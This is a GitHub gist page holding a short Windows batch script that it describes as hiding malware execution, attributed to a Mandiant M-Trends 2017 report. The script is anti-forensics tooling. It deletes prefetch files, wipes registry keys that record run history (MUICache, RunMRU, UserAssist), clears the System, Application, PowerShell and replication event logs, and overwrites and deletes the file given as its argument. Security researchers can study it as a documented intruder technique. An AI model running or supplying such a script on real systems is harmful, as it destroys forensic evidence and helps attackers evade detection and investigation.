Created
January 6, 2018 22:16
-
-
Save mgeeky/3561be7e697c62f543910851c0a26d00 to your computer and use it in GitHub Desktop.
Batch script to hide malware execution from Windows box. Source: Mandiant M-Trends 2017.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
del /f /q /s %windir%\prefetch\* | |
reg delete “HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache” /va /f | |
reg delete “HKLM\Software\Microsoft\Windows\ShellNoRoam\MUICache” /va /f | |
reg delete “HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache” /va /f | |
reg delete “HKLM\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache” /va /f | |
reg delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU” /va /f | |
reg delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist” /va /f | |
wmic nteventlog where LogFileName=’File Replication Service’ Call ClearEventlog | |
wmic nteventlog where LogFileName=’Application’ Call ClearEventlog | |
wmic nteventlog where LogFileName=’System’ Call ClearEventlog | |
wmic nteventlog where LogFileName=’PowerShell’ Call ClearEventlog | |
ren %1 temp000 & copy /y %windir%\regedit.exe temp000 & del temp000 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment